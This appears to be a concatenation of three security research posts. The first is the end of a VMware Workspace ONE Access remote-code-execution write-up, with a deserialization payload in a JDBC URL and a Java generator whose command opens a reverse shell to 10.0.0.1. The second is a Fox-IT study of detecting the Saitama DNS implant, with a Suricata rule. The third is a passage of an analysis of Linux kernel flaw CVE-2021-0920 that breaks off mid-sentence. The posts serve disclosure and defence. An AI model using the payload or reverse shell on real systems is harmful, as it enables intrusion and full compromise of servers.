this._htEvalStart = (Hashtable)var5.readObject(); // 7 log.debug(new Object[]{"restored " + this._htEvalStart.size() + " entries from state info"}); return true; } } catch (Exception var6) { log.warn(new Object[]{var6.getMessage()}); return false; } } }  At [6] the code will call decrypt, and decrypt the string using a hardcoded key. Then at [7] the code will call readObject on the attacker supplied string. At this point we could supply our deserialization gadget right into the jdbc uri string, removing any outgoing connection requirement! Here is a proof of concept to execute the command touch /tmp/pwn: jdbc:postgresql://si/saas?socketFactory=com.vmware.licensecheck.LicenseChecker%26socketFactoryArg=yv7a3gAACwQAAAAIUhcrRObG2UIAAAAQoz1rm0A08QaIZG2jKm3PvgAACuBO%252Bkf56P3LYUtlxM%252Fd9BtAjxDOFJAiL9KmHfk1p01I544KCUNyVi2UpONDLJHejQCbZi20R8JW3zg879309FDfjSabzvJ2PxvJafQqei8egUOn32BJngdb1r0jwJ8rrxsheJQc3BXJny6pma9pHciqmjJUioTfyKousm%252Fk8YiId8nFu0IX2yQS3GkvV%252FUHCz06KusffoQatuTOL465%252BChdQG88W9FGawgr7Pc9TzZTDZoy%252Bel83sU9hFqcW0oaDgQGtvsVjovnL71fsbQ2ik4C0p8lKxgGRamJmZKl5UvrWpgbOoi5ueTPvr2RgsvyrYno%252Bg3EghzuYjfgdG5owEIPAbHY39mgsjnFR5VZlJR6xmeEkadeGYfvhv%252FU9X57N6a3jmUvCpd50a96GQawp%252BmnfNx5hvp7z%252BjKuSecJ9ruTClM7P9XnU0hspHYgPIXk085Vhdh0P%252BECl%252F7pAAq0rZVEittj43DZhRDbvjqnEbd%252FvueXUK3e0Ld7PZ5oZa055dPxI7uw9FPYMEGnq6WLjFAyZT13QrnITd7uESJE82ZCgDLT7V81UHv3E9DPFPsryRITA9wAu4EycM4aGlh%252FcJzmxKCG%252Fcrt9FvzeQd4SGxhOK7i2I%252B4OUy8mjKgDh4dajVM8cVEogVqnyPWCP7ZYJsPrUlx2F6lhGo53%252BuBQzMzu2IerBZRVeE43CsxfBW1073y8FRYxX8A8w%252BaGikZUcanJ6T%252FfW0z7ENfTTXJYzt%252BNaEsZo5Q2FTeOgzg9%252BLE9d64w7P4SZ5HjIl4xnji2KjUZ2%252FGzzRhSxbsy3EyHvWJurBaNx1mOuYReexqHe7Va1mKjJHizU88T9kn6IVc8yCO9npFl%252Bh4uLAiruwHCC0YZK4O%252F%252BmfOb%252Fb3WescghMkp2s%252FxMe4bfjeomQWqzobztKry32vWM%252BovpDJHbOlTANviW50AzaXCVjGF10Ch86XAsHyiEpb44CzaMSWXV%252BfnQFw%252FRgY9uhv%252FUoUtxZs%252FmOpzSxgywFUNGaC1%252FoMXWmqJ5pne2fO2tH3EYyLhBIbK4GpTY5vzC8yRqYAyVW6LgkK%252FLZerScwc49NjWLZXMYOr9bsH2Ed2TEoy5sYUnMPmN19%252FZQqYWO2N1UaCV1D7F9V3z6fKRuhq0EyNj5RvXg%252BdUz%252FBuUzoju7Rbky1dYg3mQr4AbX94bi%252FLK5mdWlPcavJJlmBJGpxClGQmE%252BxpW2WVrQtAOGJrlcC0oTJSbe8ynPWoXbhqW3uXsNU2r5a2axQgNJfQDGomgtViDeqARbMrAoicMHIUH%252B1GDv9tLwaKMcBJC48ENoUrUfaFn68S9pFesqvjzvMB0Q%252BLmiXF9pfO02fVG5FWuMwouEYANrbnbL7MiPqoGPTwS6547LJh%252BScQ4dYc1Ga%252Bqfxh0NCXSfeetVdY7w7rilctRpe%252Fgchj6Q7SAK2%252BcX%252B0qlozTXdBhYvCOgWoXf5OYelsPJp%252BYPylKJyKC4v1fPskeZic8SA5EPKBQGmcwP09BmwD6J7t9GFMyvnxgl1Zlr5EggDqT7QXW0RhH4e%252FM7Jjhp4D%252F%252F1y8nfEfM23MqrRSZ%252B33P5xMXrbA7SgUbaC8fFlma85xpcaS1VBvs4%252FvUNs5Wsl9D2hAsiiBFu3vQiGXJVsB7KmV8Vuh2shiD8Akq5R2%252F3oSb1t%252BLm0ZcIP4MYLtvGkyfBXj81C3KKKNta4tZTpZW7MfeiXo%252FMoorn06fxlh7elFoPYLZ5eA7DB0jwBtUJ1Ay4xNgL24DnQlIwWkTrZJvdIzs0zTvFv3yYvgq4CaNwDDBbGdYufSRULnI8BAJgedXQqVkV9a3W4nK%252FYCMyczUZ%252FI2Nsslf4zqb3s1RJltGAPsHoR7YjKC1iZG1b%252BYGSN%252FyCW6RZJGxESArr3a1pcNndQUIzabKjIotYOFtMdrAdF9xXKNcMYN8qdFhAJ6PUkS%252FRuu%252F7YxM9xzpN9%252Br4JuuwnO8P6n4l9mib8J6ElX1GXw5Tc7MpdVcW%252BUqkKRLICuh1H5f53E8MO4ESJ2Ku56xvNZyJ0Ai2LDzumgORDeVJa4BLrUgeRkTZqOkYdRWHXrFTTP9HFgXobAQqj75nRkpFEQMEzbKSjdQAU%252B%252Bq2730wMh5LuVRui7HUPnvUCZDpkgDr9GDMGJitt%252FU6RtHqQmYB%252B%252FpFLr7m3g1tazYHvEyrQjBKdhv2FfijNtYaskJqkqPx3uRMSy%252F5l6wmQQlwbOTGXlAdUtVfKpO537dXFOofuN%252BuzIAQdXaLRddhE7fFhhrMwQXuj1jCDi70d%252FWBsy6lHxephuN5ANcl3IuGhx4MV0XRbZpt4MpGqJ2eZM18UCyk%252Fg4a%252Bgp0eRQWgA3KPJ9pZJiGk8EBFBeqsu2Y%252BIcVjGLKzghcdPpsBt3ef1TKUO0DZbS2RLMvA1dtq1vxGYuAIMHJ%252BxREAwSywn7ON9RqrF56hS91rlYJfBjPC%252FSurUVD98wa9WjqygmVsiI78QzExmrAmstUz5WsvLFl%252BoYKR%252FRLKYtjihNvFaSPYkbRNJ1GzKL0ZOXMyDJ3KcPeSkJa13vbJqmBO1JAuG8sfuRXjmaYNWdXI%252Bb%252Bkhs4V5o9IYnehTZgj4LHS7idmBjbWskldTDZHxofnnGKZenTPzbfsCzDKaGg5evEO6qpk%252FegKKK6ORyfxulQB0%252B5wzl0Z1TW3eLuRzi8jeo%252Fx3OOqgbLIqnfWFFfhezTnSYYBJdVEC4hwRksjZ9AReieEKYeZyqb1Hybg4w3q1H2I16iH4ku5R%252FCJnZBHcgPRZniF1Bohq79vgyJs9MAsfTwc%252F%252BAXUBbV8DnfdxoWwzLms6cqP2Bcuu86qORtOE4K5fNMEvYAy30%252FE70zdZoNMS%252BOsb0Lbl1cuxVpuwza0herBOLDBNlPMbi90pQ7Mt6OA7VwCiUW3TsdivLEPYKBQ3q5a5R0DEScmh5Y9BGYxgwXKfACbTjXHkrCcGLwSxTvEFJ4sjTxa%252By3rgVjWTXaRy91GRfcoNouIBmY%252FDj1ilIYPRBTP23a9IdO4M%252F4R%252FLlX454wJksnuTu6sTID7G1ELvBHCyFxjMAl0meovxnI1uZ6PuWDaC5ax4WIeG2PodvqHKdRLbU0OzmD8XyjdxY4c%252F%252FJQRl85xQ8LdlgWMrTTIlWy6jf0Z2ERwc5Oi7DK5WMZD9p2b3lARlNgo0LORSenjefQkIjAqEXXLpRYTAeJXmHJiK3iCnrNO2R8QmdujTPQthLQaAnoDuHf7Mt1iWnUTuwYv9e64ndK7lZ3%252FBjb4MYssgc9PavSz9tAP00jZXZbq%252BM2zl2AukG0IMtunNv86dO%252BlekCjSgv%252BGH7KxNa5Yb1dlvR62c2vhE8U%252Bq%252BEU7CR4Z8lfJoAYrHMcWqlerIdc44GskzJVKb4LbpLqCMQFx3Gh%252Fq%252FwuwguPLDiQCNnyta5d9QO3aoY4BkzimWshsgyJzesREag3YehFjvfUSl%252B2Ytn5J2aHZmx3tOPrh1fa6480lb%252BWC%252Bex40M4RjPXOQKxB07UWUvumml%252BYwA8jqCcwhz0n2gHUsFHq4UovgBlETV9r7uOTX6hDHO5ztgca6c1KUINt1LA2EzFd6Hedjzx5%252FjVJb8SyviMQl4SyCeyPRS8FMGkPda8oGAiPGyc99tcQg6XItDYG0XIw%252BN59tQ8Pvfx9EBM1TOcP7NGWb7LdZixcDnLDBw77kVwxJEvcGZ2sTqIG7VdZvNsGupRwLqqeLkEpQM4%253D  Note that your payload will need to double encode special characters. To generate the state string, I re-used VMWare’s classes: import com.vmware.licensecheck.LicenseChecker; import com.vmware.licensecheck.LicenseHandle; import com.vmware.licensecheck.MyBase64; import ysoserial.payloads.ObjectPayload.Utils; import java.lang.reflect.Field; import java.net.URLEncoder; import java.util.Hashtable; import java.io.*; public class Poc { public static void main(String[] args) throws Exception { String shell = MyBase64.encode("bash -c \"bash -i >& /dev/tcp/10.0.0.1/1234 0>&1\"".getBytes()); Object payload = Utils.makePayloadObject("CommonsBeanutils1", String.format("sh -c [email protected]|sh . echo echo %s|base64 -d|bash", shell)); LicenseChecker lc = new LicenseChecker(null); Field handleField = LicenseChecker.class.getDeclaredField("_handle"); handleField.setAccessible(true); LicenseHandle lh = (LicenseHandle)handleField.get(lc); Field htEvalStartField = LicenseHandle.class.getDeclaredField("_htEvalStart"); htEvalStartField.setAccessible(true); Field isDirtyField = LicenseHandle.class.getDeclaredField("_isDirty"); isDirtyField.setAccessible(true); Hashtable<Integer, Object> ht = new Hashtable<Integer, Object>(); ht.put(1337, payload); htEvalStartField.set(lh, ht); isDirtyField.set(lh, true); handleField.set(lc, lh); String payload = URLEncoder.encode(URLEncoder.encode(lc.getState(), "UTF-8"), "UTF-8"); System.out.println(String.format("(+) jdbc:postgresql://si/saas?socketFactory=com.vmware.licensecheck.LicenseChecker%%26socketFactoryArg=%s", payload)); } }  I have included the licensecheck-1.1.5.jar library in the exploit directory so that the exploit can be re-built and replicated. It should be noted that the first connection to a PostgreSQL database doesn’t need to be established for the attack to succeed so an invalid host/port is perfectly fine. Details about this attack and others similar to it can be found in the excellent blog post by Xu Yuanzhen. The final point I will make about this is that the LicenseChecker class could have also been used to exploit CVE-2021-21985 since the licensecheck-1.1.5.jar library was loaded into the target vCenter process coupled with publicly available gadget chains. ### publishCaCert and gatherConfig Privilege Escalation This exploit was straight forward and involved overwriting the permissions of the certproxyService.sh script so that it can be modified by the horizon user. ## Proof of Concept I built three exploits called Hekate (that’s pronounced as heh-ka-teh). The first exploit leverages the MySQL JDBC driver and the second exploit leverages the PostgreSQL JDBC driver. Both exploits target the server and client sides, requiring an outbound connection to the attacker. The third exploit leverages the PostgreSQL JDBC driver again, this time re-using the com.vmware.licensecheck.* classes and avoids any outbound network connections to the attacker. This is the exploit that was demonstrated at Black Hat USA 2022. All three exploits can be downloaded here: https://github.com/sourceincite/hekate/. Server-side Client-side All the vulnerabilities used in Hekate also impacted the cloud version of the VMWare Workspace ONE Access in its default configuration. ## Exposure Using a quick favicon hash search, Shodan reveals ~700 active hosts were vulnerable at the time of discovery. Although the exposure is limited, the systems impacted are highly critical. An attacker will be able to gain access to third party systems, grant assertions and breach the perimeter of an enterprise network all of which can’t be done with your run-of-the-mill exposed IoT device. ## Conclusion The limitations of CVE-2020-4006 was that it required authentication and it was targeting port 8443. In comparison, this attack chain targets port 443 which is much more likely exposed externally. Additionally, no authentication was required all whilst achieving root access making it quite disastrous and results in the complete compromise of the affected appliance. Finally, it can be exploited in a variety of ways such as client-side or server-side without the requirement of a deserialization gadget. ## References # Detecting DNS implants: Old kitten, new tricks – A Saitama Case Study 11 August 2022 at 15:20 Max Groot & Ruud van Luijk TL;DR A recently uncovered malware sample dubbed ‘Saitama’ was uncovered by security firm Malwarebytes in a weaponized document, possibly targeted towards the Jordan government. This Saitama implant uses DNS as its sole Command and Control channel and utilizes long sleep times and (sub)domain randomization to evade detection. As no server-side implementation was available for this implant, our detection engineers had very little to go on to verify whether their detection would trigger on such a communication channel. This blog documents the development of a Saitama server-side implementation, as well as several approaches taken by Fox-IT / NCC Group’s Research and Intelligence Fusion Team (RIFT) to be able to detect DNS-tunnelling implants such as Saitama. Introduction For its Managed Detection and Response (MDR) offering, Fox-IT is continuously building and testing detection coverage for the latest threats. Such detection efforts vary across all tactics, techniques, and procedures (TTP’s) of adversaries, an important one being Command and Control (C2). Detection of Command and Control involves catching attackers based on the communication between the implants on victim machines and the adversary infrastructure. In May 2022, security firm Malwarebytes published a two1-part2 blog about a malware sample that utilizes DNS as its sole channel for C2 communication. This sample, dubbed ‘Saitama’, sets up a C2 channel that tries to be stealthy using randomization and long sleep times. These features make the traffic difficult to detect even though the implant does not use DNS-over-HTTPS (DoH) to encrypt its DNS queries. Although DNS tunnelling remains a relatively rare technique for C2 communication, it should not be ignored completely. While focusing on Indicators of Compromise (IOC’s) can be useful for retroactive hunting, robust detection in real-time is preferable. To assess and tune existing coverage, a more detailed understanding of the inner workings of the implant is required. This blog will use the Saitama implant to illustrate how malicious DNS tunnels can be set-up in a variety of ways, and how this variety affects the detection engineering process. To assist defensive researchers, this blogpost comes with the publication of a server-side implementation of Saitama. This can be used to control the implant in a lab environment. Moreover, ‘on the wire’ recordings of the implant that were generated using said implementation are also shared as PCAP and Zeek logs. This blog also details multiple approaches towards detecting the implant’s traffic, using a Suricata signature and behavioural detection. Reconstructing the Saitama traffic The behaviour of the Saitama implant from the perspective of the victim machine has already been documented elsewhere3. However, to generate a full recording of the implant’s behaviour, a C2 server is necessary that properly controls and instructs the implant. Of course, the source code of the C2 server used by the actual developer of the implant is not available. If you aim to detect the malware in real-time, detection efforts should focus on the way traffic is generated by the implant, rather than the specific domains that the traffic is sent to. We strongly believe in the “PCAP or it didn’t happen” philosophy. Thus, instead of relying on assumptions while building detection, we built the server-side component of Saitama to be able to generate a PCAP. The server-side implementation of Saitama can be found on the Fox-IT GitHub page. Be aware that this implementation is a Proof-of-Concept. We do not intend on fully weaponizing the implant “for the greater good”, and have thus provided resources to the point where we believe detection engineers and blue teamers have everything they need to assess their defences against the techniques used by Saitama. Let’s do the twist The usage of DNS as the channel for C2 communication has a few upsides and quite some major downsides from an attacker’s perspective. While it is true that in many environments DNS is relatively unrestricted, the protocol itself is not designed to transfer large volumes of data. Moreover, the caching of DNS queries forces the implant to make sure that every DNS query sent is unique, to guarantee the DNS query reaches the C2 server. For this, the Saitama implant relies on continuously shuffling the character set used to construct DNS queries. While this shuffle makes it near-impossible for two consecutive DNS queries to be the same, it does require the server and client to be perfectly in sync for them to both shuffle their character sets in the same way. On startup, the Saitama implant generates a random number between 0 and 46655 and assigns this to a counter variable. Using a shared secret key (“haruto” for the variant discussed here) and a shared initial character set (“razupgnv2w01eos4t38h7yqidxmkljc6b9f5”), the client encodes this counter and sends it over DNS to the C2 server. This counter is then used as the seed for a Pseudo-Random Number Generator (PRNG). Saitama uses the Mersenne Twister to generate a pseudo-random number upon every ‘twist’. To encode this counter, the implant relies on a function named ‘_IntToString’. This function receives an integer and a ‘base string’, which for the first DNS query is the same initial, shared character set as identified in the previous paragraph. Until the input number is equal or lower than zero, the function uses the input number to choose a character from the base string and prepends that to the variable ‘str’ which will be returned as the function output. At the end of each loop iteration, the input number is divided by the length of the baseString parameter, thus bringing the value down. To determine the initial seed, the server has to ‘invert’ this function to convert the encoded string back into its original number. However, information gets lost during the client-side conversion because this conversion rounds down without any decimals. The server tries to invert this conversion by using simple multiplication. Therefore, the server might calculate a number that does not equal the seed sent by the client and thus must verify whether the inversion function calculated the correct seed. If this is not the case, the server literately tries higher numbers until the correct seed is found. Once this hurdle is taken, the rest of the server-side implementation is trivial. The client appends its current counter value to every DNS query sent to the server. This counter is used as the seed for the PRNG. This PRNG is used to shuffle the initial character set into a new one, which is then used to encode the data that the client sends to the server. Thus, when both server and client use the same seed (the counter variable) to generate random numbers for the shuffling of the character set, they both arrive at the exact same character set. This allows the server and implant to communicate in the same ‘language’. The server then simply substitutes the characters from the shuffled alphabet back into the ‘base’ alphabet to derive what data was sent by the client. Twist, Sleep, Send, Repeat Many C2 frameworks allow attackers to manually set the minimum and maximum sleep times for their implants. While low sleep times allow attackers to more quickly execute commands and receive outputs, higher sleep times generate less noise in the victim network. Detection often relies on thresholds, where suspicious behaviour will only trigger an alert when it happens multiple times in a certain period. The Saitama implant uses hardcoded sleep values. During active communication (such as when it returns command output back to the server), the minimum sleep time is 40 seconds while the maximum sleep time is 80 seconds. On every DNS query sent, the client will pick a random value between 40 and 80 seconds. Moreover, the DNS query is not sent to the same domain every time but is distributed across three domains. On every request, one of these domains is randomly chosen. The implant has no functionality to alter these sleep times at runtime, nor does it possess an option to ‘skip’ the sleeping step altogether. These sleep times and distribution of communication hinder detection efforts, as they allow the implant to further ‘blend in’ with legitimate network traffic. While the traffic itself appears anything but benign to the trained eye, the sleep times and distribution bury the ‘needle’ that is this implant’s traffic very deep in the haystack of the overall network traffic. For attackers, choosing values for the sleep time is a balancing act between keeping the implant stealthy while keeping it usable. Considering Saitama’s sleep times and keeping in mind that every individual DNS query only transmits 15 bytes of output data, the usability of the implant is quite low. Although the implant can compress its output using zlib deflation, communication between server and client still takes a lot of time. For example, the standard output of the ‘whoami /priv’ command, which once zlib deflated is 663 bytes, takes more than an hour to transmit from victim machine to a C2 server. The implant does contain a set of hardcoded commands that can be triggered using only one command code, rather than sending the command in its entirety from the server to the client. However, there is no way of knowing whether these hardcoded commands are even used by attackers or are left in the implant as a means of misdirection to hinder attribution. Moreover, the output from these hardcoded commands still has to be sent back to the C2 server, with the same delays as any other sent command. Detection Detecting DNS tunnelling has been the subject of research for a long time, as this technique can be implemented in a multitude of different ways. In addition, the complications of the communication channel force attackers to make more noise, as they must send a lot of data over a channel that is not designed for that purpose. While ‘idle’ implants can be hard to detect due to little communication occurring over the wire, any DNS implant will have to make more noise once it starts receiving commands and sending command outputs. These communication ‘bursts’ is where DNS tunnelling can most reliably be detected. In this section we give examples of how to detect Saitama and a few well-known tools used by actual adversaries. Signature-based Where possible we aim to write signature-based detection, as this provides a solid base and quick tool attribution. The randomization used by the Saitama implant as outlined previously makes signature-based detection challenging in this case, but not impossible. When actively communicating command output, the Saitama implant generates a high number of randomized DNS queries. This randomization does follow a specific pattern that we believe can be generalized in the following Suricata rule: alert dns$HOME_NET any -> any 53 (msg:"FOX-SRT - Trojan - Possible Saitama Exfil Pattern Observed"; flow:stateless; content:"|00 01 00 00 00 00 00 00|"; byte_test:1,>=,0x1c,0,relative; fast_pattern; byte_test:1,<=,0x1f,0,relative; dns_query; content:"."; content:"."; distance:1; content:!"."; distance:1; pcre:"/^(?=[0-9]+[a-z]\|[a-z]+[0-9])[a-z0-9]{28,31}\.[^.]+\.[a-z]+$/"; threshold:type both, track by_src, count 50, seconds 3600; classtype:trojan-activity; priority:2; reference:url, https://github.com/fox-it/saitama-server; metadata:ids suricata; sid:21004170; rev:1;)  This signature may seem a bit complex, but if we dissect this into separate parts it is intuitive given the previous parts. The choice for 28-31 characters is based on the structure of DNS queries containing output. First, one byte is dedicated to the ‘send and receive’ command code. Then follows the encoded ID of the implant, which can take between 1 and 3 bytes. Then, 2 bytes are dedicated to the byte index of the output data. Followed by 20 bytes of base-32 encoded output. Lastly the current value for the ‘counter’ variable will be sent. As this number can range between 0 and 46656, this takes between 1 and 5 bytes. Behaviour-based The randomization that makes it difficult to create signatures is also to the defender’s advantage: most benign DNS queries are far from random. As seen in the table below, each hack tool outlined has at least one subdomain that has an encrypted or encoded part. While initially one might opt for measuring entropy to approximate randomness, said technique is less reliable when the input string is short. The usage of N-grams, an approach we have previously written about4, is better suited. Unfortunately, the detection of randomness in DNS queries is by itself not a solid enough indicator to detect DNS tunnels without yielding large numbers of false positives. However, a second limitation of DNS tunnelling is that a DNS query can only carry a limited number of bytes. To be an effective C2 channel an attacker needs to be able to send multiple commands and receive corresponding output, resulting in (slow) bursts of multiple queries. This is where the second step for behaviour-based detection comes in: plainly counting the number of unique queries that have been classified as ‘randomized’. The specifics of these bursts differ slightly between tools, but in general, there is no or little idle time between two queries. Saitama is an exception in this case. It uses a uniformly distributed sleep between 40 and 80 seconds between two queries, meaning that on average there is a one-minute delay. This expected sleep of 60 seconds is an intuitive start to determine the threshold. If we aggregate over an hour, we expect 60 queries distributed over 3 domains. However, this is the mean value and in 50% of the cases there are less than 60 queries in an hour. To be sure we detect this, regardless of random sleeps, we can use the fact that the sum of uniform random observations approximates a normal distribution. With this distribution we can calculate the number of queries that result in an acceptable probability. Looking at the distribution, that would be 53. We use 50 in our signature and other rules to incorporate possible packet loss and other unexpected factors. Note that this number varies between tools and is therefore not a set-in-stone threshold. Different thresholds for different tools may be used to balance False Positives and False Negatives. In summary, combining detection for random-appearing DNS queries with a minimum threshold of random-like DNS queries per hour, can be a useful approach for the detection of DNS tunnelling. We found in our testing that there can still be some false positives, for example caused by antivirus solutions. Therefore, a last step is creating a small allow list for domains that have been verified to be benign. While more sophisticated detection methods may be available, we believe this method is still powerful (at least powerful enough to catch this malware) and more importantly, easy to use on different platforms such as Network Sensors or SIEMs and on diverse types of logs. Conclusion When new malware arises, it is paramount to verify existing detection efforts to ensure they properly trigger on the newly encountered threat. While Indicators of Compromise can be used to retroactively hunt for possible infections, we prefer the detection of threats in (near-)real-time. This blog has outlined how we developed a server-side implementation of the implant to create a proper recording of the implant’s behaviour. This can subsequently be used for detection engineering purposes. Strong randomization, such as observed in the Saitama implant, significantly hinders signature-based detection. We detect the threat by detecting its evasive method, in this case randomization. Legitimate DNS traffic rarely consists of random-appearing subdomains, and to see this occurring in large bursts to previously unseen domains is even more unlikely to be benign. Resources With the sharing of the server-side implementation and recordings of Saitama traffic, we hope that others can test their defensive solutions. The server-side implementation of Saitama can be found on the Fox-IT GitHub. This repository also contains an example PCAP & Zeek logs of traffic generated by the Saitama implant. The repository also features a replay script that can be used to parse executed commands & command output out of a PCAP. References # The quantum state of Linux kernel garbage collection CVE-2021-0920 (Part I) 10 August 2022 at 23:00 A deep dive into an in-the-wild Android exploit Guest Post by Xingyu Jin, Android Security Research This is part one of a two-part guest blog post, where first we'll look at the root cause of the CVE-2021-0920 vulnerability. In the second post, we'll dive into the in-the-wild 0-day exploitation of the vulnerability and post-compromise modules. # Overview of in-the-wild CVE-2021-0920 exploits A surveillance vendor named Wintego has developed an exploit for Linux socket syscall 0-day, CVE-2021-0920, and used it in the wild since at least November 2020 based on the earliest captured sample, until the issue was fixed in November 2021. Combined with Chrome and Samsung browser exploits, the vendor was able to remotely root Samsung devices. The fix was released with the November 2021 Android Security Bulletin, and applied to Samsung devices in Samsung's December 2021 security update. Google's Threat Analysis Group (TAG) discovered Samsung browser exploit chains being used in the wild. TAG then performed root cause analysis and discovered that this vulnerability, CVE-2021-0920, was being used to escape the sandbox and elevate privileges. CVE-2021-0920 was reported to Linux/Android anonymously. The Google Android Security Team performed the full deep-dive analysis of the exploit. This issue was initially discovered in 2016 by a RedHat kernel developer and disclosed in a public email thread, but the Linux kernel community did not patch the issue until it was re-reported in 2021. Various Samsung devices were targeted, including the Samsung S10 and S20. By abusing an ephemeral race condition in Linux kernel garbage collection, the exploit code was able to obtain a use-after-free (UAF) in a kernel sk_buff object. The in-the-wild sample could effectively circumvent CONFIG_ARM64_UAO, achieve arbitrary read / write primitives and bypass Samsung RKP to elevate to root. Other Android devices were also vulnerable, but we did not find any exploit samples against them. Text extracted from captured samples dubbed the vulnerability “quantum Linux kernel garbage collection”, which appears to be a fitting title for this blogpost. # Introduction CVE-2021-0920 is a use-after-free (UAF) due to a race condition in the garbage collection system for SCM_RIGHTS. SCM_RIGHTS is a control message that allows unix-domain sockets to transmit an open file descriptor from one process to another. In other words, the sender transmits a file descriptor and the receiver then obtains a file descriptor from the sender. This passing of file descriptors adds complexity to reference-counting file structs. To account for this, the Linux kernel community designed a special garbage collection system. CVE-2021-0920 is a vulnerability within this garbage collection system. By winning a race condition during the garbage collection process, an adversary can exploit the UAF on the socket buffer, sk_buff object. In the following sections, we’ll explain the SCM_RIGHTS garbage collection system and the details of the vulnerability. The analysis is based on the Linux 4.14 kernel. ## What is SCM_RIGHTS? Linux developers can share file descriptors (fd) from one process to another using the SCM_RIGHTS datagram with the sendmsg syscall. When a process passes a file descriptor to another process, SCM_RIGHTS will add a reference to the underlying file struct. This means that the process that is sending the file descriptors can immediately close the file descriptor on their end, even if the receiving process has not yet accepted and taken ownership of the file descriptors. When the file descriptors are in the “queued” state (meaning the sender has passed the fd and then closed it, but the receiver has not yet accepted the fd and taken ownership), specialized garbage collection is needed. To track this “queued” state, this LWN article does a great job explaining SCM_RIGHTS reference counting, and it's recommended reading before continuing on with this blogpost. ## Sending As stated previously, a unix domain socket uses the syscall sendmsg to send a file descriptor to another socket. To explain the reference counting that occurs during SCM_RIGHTS, we’ll start from the sender’s point of view. We start with the kernel function unix_stream_sendmsg, which implements the sendmsg syscall. To implement the SCM_RIGHTS functionality, the kernel uses the structure scm_fp_list for managing all the transmitted file structures. scm_fp_list stores the list of file pointers to be passed.  struct scm_fp_list { short count; short max; struct user_struct *user; struct file *fp[SCM_MAX_FD]; }; unix_stream_sendmsg invokes scm_send (af_unix.c#L1886) to initialize the scm_fp_list structure, linked by the scm_cookie structure on the stack.  struct scm_cookie { struct pid *pid; /* Skb credentials */ struct scm_fp_list *fp; /* Passed files */ struct scm_creds creds; /* Skb credentials */ #ifdef CONFIG_SECURITY_NETWORK u32 secid; /* Passed security ID */ #endif }; To be more specific, scm_send → __scm_send → scm_fp_copy (scm.c#L68) reads the file descriptors from the userspace and initializes scm_cookie->fp which can contain SCM_MAX_FD file structures. Since the Linux kernel uses the sk_buff (also known as socket buffers or skb) object to manage all types of socket datagrams, the kernel also needs to invoke the unix_scm_to_skb function to link the scm_cookie->fp to a corresponding skb object. This occurs in unix_attach_fds (scm.c#L103):  … /* * Need to duplicate file references for the sake of garbage * collection. Otherwise a socket in the fps might become a * candidate for GC while the skb is not yet queued. */ UNIXCB(skb).fp = scm_fp_dup(scm->fp); if (!UNIXCB(skb).fp) return -ENOMEM; … The scm_fp_dup call in unix_attach_fds increases the reference count of the file descriptor that’s being passed so the file is still valid even after the sender closes the transmitted file descriptor later:  struct scm_fp_list *scm_fp_dup(struct scm_fp_list *fpl) { struct scm_fp_list *new_fpl; int i; if (!fpl) return NULL; new_fpl = kmemdup(fpl, offsetof(struct scm_fp_list, fp[fpl->count]), GFP_KERNEL); if (new_fpl) { for (i = 0; i < fpl->count; i++) get_file(fpl->fp[i]); new_fpl->max = new_fpl->count; new_fpl->user = get_uid(fpl->user); } return new_fpl; } Let’s examine a concrete example. Assume we have sockets A and B. The A attempts to pass itself to B. After the SCM_RIGHTS datagram is sent, the newly allocated skb from the sender will be appended to the B’s sk_receive_queue which stores received datagrams: sk_buff carries scm_fp_list structure The reference count of A is incremented to 2 and the reference count of B is still 1. ## Receiving Now, let’s take a look at the receiver side unix_stream_read_generic (we will not discuss the MSG_PEEK flag yet, and focus on the normal routine). First of all, the kernel grabs the current skb from sk_receive_queue using skb_peek. Secondly, since scm_fp_list is attached to the skb, the kernel will call unix_detach_fds (link) to parse the transmitted file structures from skb and clear the skb from sk_receive_queue:  /* Mark read part of skb as used */ if (!(flags & MSG_PEEK)) { UNIXCB(skb).consumed += chunk; sk_peek_offset_bwd(sk, chunk); if (UNIXCB(skb).fp) unix_detach_fds(&scm, skb); if (unix_skb_len(skb)) break; skb_unlink(skb, &sk->sk_receive_queue); consume_skb(skb); if (scm.fp) break; The function scm_detach_fds iterates over the list of passed file descriptors (scm->fp) and installs the new file descriptors accordingly for the receiver:  for (i=0, cmfptr=(__force int __user *)CMSG_DATA(cm); imsg_flags ? O_CLOEXEC : 0); if (err < 0) break; new_fd = err; err = put_user(new_fd, cmfptr); if (err) { put_unused_fd(new_fd); break; } /* Bump the usage count and install the file. */ sock = sock_from_file(fp[i], &err); if (sock) { sock_update_netprioidx(&sock->sk->sk_cgrp_data); sock_update_classid(&sock->sk->sk_cgrp_data); } fd_install(new_fd, get_file(fp[i])); } … /* * All of the files that fit in the message have had their * usage counts incremented, so we just free the list. */ __scm_destroy(scm); Once the file descriptors have been installed, __scm_destroy (link) cleans up the allocated scm->fp and decrements the file reference count for every transmitted file structure:  void __scm_destroy(struct scm_cookie *scm) { struct scm_fp_list *fpl = scm->fp; int i; if (fpl) { scm->fp = NULL; for (i=fpl->count-1; i>=0; i--) fput(fpl->fp[i]); free_uid(fpl->user); kfree(fpl); } } ## Reference Counting and Inflight Counting As mentioned above, when a file descriptor is passed using SCM_RIGHTS, its reference count is immediately incremented. Once the recipient socket has accepted and installed the passed file descriptor, the reference count is then decremented. The complication comes from the “middle” of this operation: after the file descriptor has been sent, but before the receiver has accepted and installed the file descriptor. Let’s consider the following scenario: 1. The process creates sockets A and B. 2. A sends socket A to socket B. 3. B sends socket B to socket A. 4. Close A. 5. Close B. Scenario for reference count cycle Both sockets are closed prior to accepting the passed file descriptors.The reference counts of A and B are both 1 and can't be further decremented because they were removed from the kernel fd table when the respective processes closed them. Therefore the kernel is unable to release the two skbs and sock structures and an unbreakable cycle is formed. The Linux kernel garbage collection system is designed to prevent memory exhaustion in this particular scenario. The inflight count was implemented to identify potential garbage. Each time the reference count is increased due to an SCM_RIGHTS datagram being sent, the inflight count will also be incremented. When a file descriptor is sent by SCM_RIGHTS datagram, the Linux kernel puts its unix_sock into a global list gc_inflight_list. The kernel increments unix_tot_inflight which counts the total number of inflight sockets. Then, the kernel increments u->inflight which tracks the inflight count for each individual file descriptor in the unix_inflight function (scm.c#L45) invoked from unix_attach_fds:  void unix_inflight(struct user_struct *user, struct file *fp) { struct sock *s = unix_get_socket(fp); spin_lock(&unix_gc_lock); if (s) { struct unix_sock *u = unix_sk(s); if (atomic_long_inc_return(&u->inflight) == 1) { BUG_ON(!list_empty(&u->link)); list_add_tail(&u->link, &gc_inflight_list); } else { BUG_ON(list_empty(&u->link)); } unix_tot_inflight++; } user->unix_inflight++; spin_unlock(&unix_gc_lock); } Thus, here is what the sk_buff looks like when transferring a file descriptor within sockets A and B: The inflight count of A is incremented When the socket file descriptor is received from the other side, the unix_sock.inflight 